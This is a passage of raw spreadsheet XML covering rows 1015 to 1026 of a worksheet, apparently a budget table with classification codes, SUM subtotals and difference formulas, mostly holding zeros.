      <c r="K1015" s="17"/>
      <c r="L1015" s="17"/>
      <c r="M1015" s="17"/>
      <c r="N1015" s="17"/>
      <c r="O1015" s="17"/>
      <c r="P1015" s="17"/>
      <c r="Q1015" s="17"/>
      <c r="R1015" s="17"/>
      <c r="S1015" s="17"/>
      <c r="T1015" s="17"/>
      <c r="U1015" s="17"/>
      <c r="V1015" s="17"/>
      <c r="W1015" s="17"/>
      <c r="X1015" s="17"/>
      <c r="Y1015" s="17"/>
      <c r="Z1015" s="17"/>
      <c r="AA1015" s="17"/>
      <c r="AB1015" s="17"/>
      <c r="AC1015" s="17"/>
      <c r="AD1015" s="17"/>
      <c r="AE1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AF1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AG1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AH1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AI1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AJ1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AK1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AL1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AM1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AN1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AO1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
      <c r="AP1015" s="17">
        <f t="shared" si="486"/>
        <v>0</v>
      </c>
    </row>
    <row r="1016" ht="18" customHeight="1" spans="1:42">
      <c r="A1016" s="10"/>
      <c r="B1016" s="10"/>
      <c r="C1016" s="28"/>
      <c r="D1016" s="10">
        <v>21406</v>
      </c>
      <c r="E1016" s="11" t="s">
        <v>3778</v>
      </c>
      <c r="F1016" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1016" s="12">
        <f t="shared" ref="G1016:R1016" si="487">SUM(G1017:G1020)</f>
        <v>0</v>
      </c>
      <c r="H1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="I1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="J1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="K1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="L1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="M1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="N1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="O1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="P1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="Q1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="R1016" s="12">
        <f t="shared" si="487"/>
        <v>0</v>
      </c>
      <c r="S1016" s="12">
        <v>0</v>
      </c>
      <c r="T1016" s="12">
        <v>0</v>
      </c>
      <c r="U1016" s="12">
        <v>0</v>
      </c>
      <c r="V1016" s="12">
        <v>0</v>
      </c>
      <c r="W1016" s="12">
        <v>0</v>
      </c>
      <c r="X1016" s="12">
        <v>0</v>
      </c>
      <c r="Y1016" s="12">
        <v>0</v>
      </c>
      <c r="Z1016" s="12">
        <v>0</v>
      </c>
      <c r="AA1016" s="12">
        <v>0</v>
      </c>
      <c r="AB1016" s="12">
        <v>0</v>
      </c>
      <c r="AC1016" s="12">
        <v>0</v>
      </c>
      <c r="AD1016" s="12">
        <v>0</v>
      </c>
      <c r="AE1016" s="12">
        <f t="shared" ref="AE1016:AP1016" si="488">SUM(AE1017:AE1020)</f>
        <v>0</v>
      </c>
      <c r="AF1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AG1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AH1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AI1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AJ1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AK1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AL1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AM1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AN1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AO1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
      <c r="AP1016" s="12">
        <f t="shared" si="488"/>
        <v>0</v>
      </c>
    </row>
    <row r="1017" ht="18" customHeight="1" spans="1:42">
      <c r="A1017" s="10"/>
      <c r="B1017" s="10"/>
      <c r="C1017" s="28"/>
      <c r="D1017" s="10">
        <v>2140601</v>
      </c>
      <c r="E1017" s="16" t="s">
        <v>3779</v>
      </c>
      <c r="F1017" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1017" s="17"/>
      <c r="H1017" s="17"/>
      <c r="I1017" s="17"/>
      <c r="J1017" s="17"/>
      <c r="K1017" s="17"/>
      <c r="L1017" s="17"/>
      <c r="M1017" s="17"/>
      <c r="N1017" s="17"/>
      <c r="O1017" s="17"/>
      <c r="P1017" s="17"/>
      <c r="Q1017" s="17"/>
      <c r="R1017" s="17"/>
      <c r="S1017" s="17"/>
      <c r="T1017" s="17"/>
      <c r="U1017" s="17"/>
      <c r="V1017" s="17"/>
      <c r="W1017" s="17"/>
      <c r="X1017" s="17"/>
      <c r="Y1017" s="17"/>
      <c r="Z1017" s="17"/>
      <c r="AA1017" s="17"/>
      <c r="AB1017" s="17"/>
      <c r="AC1017" s="17"/>
      <c r="AD1017" s="17"/>
      <c r="AE1017" s="17">
        <f t="shared" ref="AE1017:AP1020" si="489">G1017-S1017</f>
        <v>0</v>
      </c>
      <c r="AF1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AG1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AH1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AI1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AJ1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AK1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AL1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AM1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AN1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AO1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AP1017" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
    </row>
    <row r="1018" ht="18" customHeight="1" spans="1:42">
      <c r="A1018" s="10"/>
      <c r="B1018" s="10"/>
      <c r="C1018" s="28"/>
      <c r="D1018" s="10">
        <v>2140602</v>
      </c>
      <c r="E1018" s="16" t="s">
        <v>3780</v>
      </c>
      <c r="F1018" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1018" s="17"/>
      <c r="H1018" s="17"/>
      <c r="I1018" s="17"/>
      <c r="J1018" s="17"/>
      <c r="K1018" s="17"/>
      <c r="L1018" s="17"/>
      <c r="M1018" s="17"/>
      <c r="N1018" s="17"/>
      <c r="O1018" s="17"/>
      <c r="P1018" s="17"/>
      <c r="Q1018" s="17"/>
      <c r="R1018" s="17"/>
      <c r="S1018" s="17"/>
      <c r="T1018" s="17"/>
      <c r="U1018" s="17"/>
      <c r="V1018" s="17"/>
      <c r="W1018" s="17"/>
      <c r="X1018" s="17"/>
      <c r="Y1018" s="17"/>
      <c r="Z1018" s="17"/>
      <c r="AA1018" s="17"/>
      <c r="AB1018" s="17"/>
      <c r="AC1018" s="17"/>
      <c r="AD1018" s="17"/>
      <c r="AE1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AF1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AG1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AH1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AI1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AJ1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AK1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AL1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AM1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AN1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AO1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AP1018" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
    </row>
    <row r="1019" ht="18" customHeight="1" spans="1:42">
      <c r="A1019" s="10"/>
      <c r="B1019" s="10"/>
      <c r="C1019" s="28"/>
      <c r="D1019" s="10">
        <v>2140603</v>
      </c>
      <c r="E1019" s="16" t="s">
        <v>3781</v>
      </c>
      <c r="F1019" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1019" s="17"/>
      <c r="H1019" s="17"/>
      <c r="I1019" s="17"/>
      <c r="J1019" s="17"/>
      <c r="K1019" s="17"/>
      <c r="L1019" s="17"/>
      <c r="M1019" s="17"/>
      <c r="N1019" s="17"/>
      <c r="O1019" s="17"/>
      <c r="P1019" s="17"/>
      <c r="Q1019" s="17"/>
      <c r="R1019" s="17"/>
      <c r="S1019" s="17"/>
      <c r="T1019" s="17"/>
      <c r="U1019" s="17"/>
      <c r="V1019" s="17"/>
      <c r="W1019" s="17"/>
      <c r="X1019" s="17"/>
      <c r="Y1019" s="17"/>
      <c r="Z1019" s="17"/>
      <c r="AA1019" s="17"/>
      <c r="AB1019" s="17"/>
      <c r="AC1019" s="17"/>
      <c r="AD1019" s="17"/>
      <c r="AE1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AF1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AG1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AH1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AI1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AJ1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AK1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AL1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AM1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AN1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AO1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AP1019" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
    </row>
    <row r="1020" ht="18" customHeight="1" spans="1:42">
      <c r="A1020" s="10"/>
      <c r="B1020" s="10"/>
      <c r="C1020" s="28"/>
      <c r="D1020" s="10">
        <v>2140699</v>
      </c>
      <c r="E1020" s="16" t="s">
        <v>3782</v>
      </c>
      <c r="F1020" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1020" s="17"/>
      <c r="H1020" s="17"/>
      <c r="I1020" s="17"/>
      <c r="J1020" s="17"/>
      <c r="K1020" s="17"/>
      <c r="L1020" s="17"/>
      <c r="M1020" s="17"/>
      <c r="N1020" s="17"/>
      <c r="O1020" s="17"/>
      <c r="P1020" s="17"/>
      <c r="Q1020" s="17"/>
      <c r="R1020" s="17"/>
      <c r="S1020" s="17"/>
      <c r="T1020" s="17"/>
      <c r="U1020" s="17"/>
      <c r="V1020" s="17"/>
      <c r="W1020" s="17"/>
      <c r="X1020" s="17"/>
      <c r="Y1020" s="17"/>
      <c r="Z1020" s="17"/>
      <c r="AA1020" s="17"/>
      <c r="AB1020" s="17"/>
      <c r="AC1020" s="17"/>
      <c r="AD1020" s="17"/>
      <c r="AE1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AF1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AG1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AH1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AI1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AJ1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AK1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AL1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AM1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AN1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AO1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
      <c r="AP1020" s="17">
        <f t="shared" si="489"/>
        <v>0</v>
      </c>
    </row>
    <row r="1021" ht="18" customHeight="1" spans="1:42">
      <c r="A1021" s="10"/>
      <c r="B1021" s="10"/>
      <c r="C1021" s="28"/>
      <c r="D1021" s="10">
        <v>21499</v>
      </c>
      <c r="E1021" s="11" t="s">
        <v>3783</v>
      </c>
      <c r="F1021" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1021" s="12">
        <f t="shared" ref="G1021:R1021" si="490">SUM(G1022:G1023)</f>
        <v>0</v>
      </c>
      <c r="H1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="I1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="J1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="K1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="L1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="M1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="N1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="O1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="P1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="Q1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="R1021" s="12">
        <f t="shared" si="490"/>
        <v>0</v>
      </c>
      <c r="S1021" s="12">
        <v>0</v>
      </c>
      <c r="T1021" s="12">
        <v>0</v>
      </c>
      <c r="U1021" s="12">
        <v>0</v>
      </c>
      <c r="V1021" s="12">
        <v>0</v>
      </c>
      <c r="W1021" s="12">
        <v>0</v>
      </c>
      <c r="X1021" s="12">
        <v>0</v>
      </c>
      <c r="Y1021" s="12">
        <v>0</v>
      </c>
      <c r="Z1021" s="12">
        <v>0</v>
      </c>
      <c r="AA1021" s="12">
        <v>0</v>
      </c>
      <c r="AB1021" s="12">
        <v>0</v>
      </c>
      <c r="AC1021" s="12">
        <v>0</v>
      </c>
      <c r="AD1021" s="12">
        <v>0</v>
      </c>
      <c r="AE1021" s="12">
        <f t="shared" ref="AE1021:AP1021" si="491">SUM(AE1022:AE1023)</f>
        <v>0</v>
      </c>
      <c r="AF1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AG1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AH1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AI1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AJ1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AK1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AL1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AM1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AN1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AO1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
      <c r="AP1021" s="12">
        <f t="shared" si="491"/>
        <v>0</v>
      </c>
    </row>
    <row r="1022" ht="18" customHeight="1" spans="1:42">
      <c r="A1022" s="10"/>
      <c r="B1022" s="10"/>
      <c r="C1022" s="28"/>
      <c r="D1022" s="10">
        <v>2149901</v>
      </c>
      <c r="E1022" s="16" t="s">
        <v>3784</v>
      </c>
      <c r="F1022" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1022" s="17"/>
      <c r="H1022" s="17"/>
      <c r="I1022" s="17"/>
      <c r="J1022" s="17"/>
      <c r="K1022" s="17"/>
      <c r="L1022" s="17"/>
      <c r="M1022" s="17"/>
      <c r="N1022" s="17"/>
      <c r="O1022" s="17"/>
      <c r="P1022" s="17"/>
      <c r="Q1022" s="17"/>
      <c r="R1022" s="17"/>
      <c r="S1022" s="17"/>
      <c r="T1022" s="17"/>
      <c r="U1022" s="17"/>
      <c r="V1022" s="17"/>
      <c r="W1022" s="17"/>
      <c r="X1022" s="17"/>
      <c r="Y1022" s="17"/>
      <c r="Z1022" s="17"/>
      <c r="AA1022" s="17"/>
      <c r="AB1022" s="17"/>
      <c r="AC1022" s="17"/>
      <c r="AD1022" s="17"/>
      <c r="AE1022" s="17">
        <f t="shared" ref="AE1022:AP1023" si="492">G1022-S1022</f>
        <v>0</v>
      </c>
      <c r="AF1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AG1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AH1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AI1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AJ1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AK1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AL1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AM1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AN1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AO1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AP1022" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
    </row>
    <row r="1023" ht="18" customHeight="1" spans="1:42">
      <c r="A1023" s="10"/>
      <c r="B1023" s="10"/>
      <c r="C1023" s="28"/>
      <c r="D1023" s="10">
        <v>2149999</v>
      </c>
      <c r="E1023" s="16" t="s">
        <v>3785</v>
      </c>
      <c r="F1023" s="14">
        <f t="shared" si="473"/>
        <v>0</v>
      </c>
      <c r="G1023" s="17"/>
      <c r="H1023" s="17"/>
      <c r="I1023" s="17"/>
      <c r="J1023" s="17"/>
      <c r="K1023" s="17"/>
      <c r="L1023" s="17"/>
      <c r="M1023" s="17"/>
      <c r="N1023" s="17"/>
      <c r="O1023" s="17"/>
      <c r="P1023" s="17"/>
      <c r="Q1023" s="17"/>
      <c r="R1023" s="17"/>
      <c r="S1023" s="17"/>
      <c r="T1023" s="17"/>
      <c r="U1023" s="17"/>
      <c r="V1023" s="17"/>
      <c r="W1023" s="17"/>
      <c r="X1023" s="17"/>
      <c r="Y1023" s="17"/>
      <c r="Z1023" s="17"/>
      <c r="AA1023" s="17"/>
      <c r="AB1023" s="17"/>
      <c r="AC1023" s="17"/>
      <c r="AD1023" s="17"/>
      <c r="AE1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AF1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AG1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AH1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AI1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AJ1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AK1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AL1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AM1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AN1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AO1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
      <c r="AP1023" s="17">
        <f t="shared" si="492"/>
        <v>0</v>
      </c>
    </row>
    <row r="1024" ht="18" customHeight="1" spans="1:42">
      <c r="A1024" s="10"/>
      <c r="B1024" s="10"/>
      <c r="C1024" s="28"/>
      <c r="D1024" s="10">
        <v>215</v>
      </c>
      <c r="E1024" s="11" t="s">
        <v>3786</v>
      </c>
      <c r="F1024" s="14">
        <f t="shared" si="473"/>
        <v>84</v>
      </c>
      <c r="G1024" s="12">
        <f t="shared" ref="G1024:R1024" si="493">G1025+G1035+G1051+G1056+G1067+G1074+G1082</f>
        <v>0</v>
      </c>
      <c r="H1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="I1024" s="12">
        <f t="shared" si="493"/>
        <v>84</v>
      </c>
      <c r="J1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="K1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="L1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="M1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="N1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="O1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="P1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="Q1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="R1024" s="12">
        <f t="shared" si="493"/>
        <v>0</v>
      </c>
      <c r="S1024" s="12">
        <v>0</v>
      </c>
      <c r="T1024" s="12">
        <v>0</v>
      </c>
      <c r="U1024" s="12">
        <v>74</v>
      </c>
      <c r="V1024" s="12">
        <v>0</v>
      </c>
      <c r="W1024" s="12">
        <v>0</v>
      </c>
      <c r="X1024" s="12">
        <v>0</v>
      </c>
      <c r="Y1024" s="12">
        <v>0</v>
      </c>
      <c r="Z1024" s="12">
        <v>0</v>
      </c>
      <c r="AA1024" s="12">
        <v>0</v>
      </c>
      <c r="AB1024" s="12">
        <v>0</v>
      </c>
      <c r="AC1024" s="12">
        <v>0</v>
      </c>
      <c r="AD1024" s="12">
        <v>0</v>
      </c>
      <c r="AE1024" s="12">
        <f t="shared" ref="AE1024:AP1024" si="494">AE1025+AE1035+AE1051+AE1056+AE1067+AE1074+AE1082</f>
        <v>0</v>
      </c>
      <c r="AF1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AG1024" s="12">
        <f t="shared" si="494"/>
        <v>10</v>
      </c>
      <c r="AH1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AI1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AJ1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AK1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AL1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AM1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AN1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AO1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
      <c r="AP1024" s="12">
        <f t="shared" si="494"/>
        <v>0</v>
      </c>
    </row>
    <row r="1025" ht="18" customHeight="1" spans="1:42">
      <c r="A1025" s="10"/>
      <c r="B1025" s="10"/>
      <c r="C1025" s="28"/>
      <c r="D1025" s="10">
        <v>21501</v>
      </c>
      <c r="E1025" s="11" t="s">
        <v>3787</v>
      </c>
      <c r="F1025" s="14">
        <f t="shared" si="473"/>
        <v>84</v>
      </c>
      <c r="G1025" s="12">
        <f t="shared" ref="G1025:R1025" si="495">SUM(G1026:G1034)</f>
        <v>0</v>
      </c>
      <c r="H1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="I1025" s="12">
        <f t="shared" si="495"/>
        <v>84</v>
      </c>
      <c r="J1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="K1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="L1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="M1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="N1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="O1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="P1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="Q1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="R1025" s="12">
        <f t="shared" si="495"/>
        <v>0</v>
      </c>
      <c r="S1025" s="12">
        <v>0</v>
      </c>
      <c r="T1025" s="12">
        <v>0</v>
      </c>
      <c r="U1025" s="12">
        <v>74</v>
      </c>
      <c r="V1025" s="12">
        <v>0</v>
      </c>
      <c r="W1025" s="12">
        <v>0</v>
      </c>
      <c r="X1025" s="12">
        <v>0</v>
      </c>
      <c r="Y1025" s="12">
        <v>0</v>
      </c>
      <c r="Z1025" s="12">
        <v>0</v>
      </c>
      <c r="AA1025" s="12">
        <v>0</v>
      </c>
      <c r="AB1025" s="12">
        <v>0</v>
      </c>
      <c r="AC1025" s="12">
        <v>0</v>
      </c>
      <c r="AD1025" s="12">
        <v>0</v>
      </c>
      <c r="AE1025" s="12">
        <f t="shared" ref="AE1025:AP1025" si="496">SUM(AE1026:AE1034)</f>
        <v>0</v>
      </c>
      <c r="AF1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AG1025" s="12">
        <f t="shared" si="496"/>
        <v>10</v>
      </c>
      <c r="AH1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AI1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AJ1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AK1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AL1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AM1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AN1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AO1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
      <c r="AP1025" s="12">
        <f t="shared" si="496"/>
        <v>0</v>
      </c>
    </row>
    <row r="1026" ht="18" customHeight="1" spans="1:42">
      <c r="A1026" s="10"/>
      <c r="B1026" s="10"/>
      <c r="C1026" s="28"/>
      <c r="D1026" s="10">
        <v>2150101</v>
      </c>
      <c r="E1026" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1026" s="14">
        <f t="shared" si="473"/>
        <v>84</v>
      </c>
      <c r="G1026" s="17"/>
      <c r="H1026" s="17"/>
      <c r="I1026" s="17">
        <v>84</v>
      </c>
      <c r="J1026" s="17"/>
      <c r="K1026" s="17"/>
      <c r="L1026" s="17"/>
      <c r="M1026" s="17"/>
      <c r="N1026" s="17"/>
      <c r="O1026" s="17"/>
      <c r="P1026" s="17"/>
      <c r="Q1026" s="17"/>
      <c r="R1026" s="17"/>
      <c r="S1026" s="17"/>
      <c r="T1026" s="17"/>
      <c r="U1026" s="17">
        <v>74</v>
      </c>
      <c r="V1026" s="17"/>
      <c r="W1026" s="17"/>
      <c r="X1026" s="17"/>
      <c r="Y1026" s="17"/>
      <c r="Z1026" s="17"/>
      <c r="AA1026" s="17"/>
      <c r="AB1026" s="17"/>
      <c r="AC1026" s="17"/>
      <c r="AD1026" s="17"/>
      <c r="AE1026" s="17">
        <f t="shared" ref="AE1026:AP1034" si="497">G1026-S1026</f>
        <v>0</v>
      </c>
      <c r="AF1026" s="17">
        <f t="shared" si="497"/>
        <v>0</v>
      </c>
      <c r="AG1026" s="17">
        <f t="shared" si="497"/>
        <v>10</v>
      </c>
      <c r="AH1026" s="17">
        <f t="shared" si="497"/>
        <v>0</v>
      </c>
      <c r="AI1026" s="17">
        <f t="shared" si="497"/>
        <v>0</v>
      </c>
      <c r="AJ1026" s="17">
        <f t="shared" si="497"/>
        <v>0</v>
      </c>
      <c r="AK1026" s="17">
        <f t="shared" si="497"/>
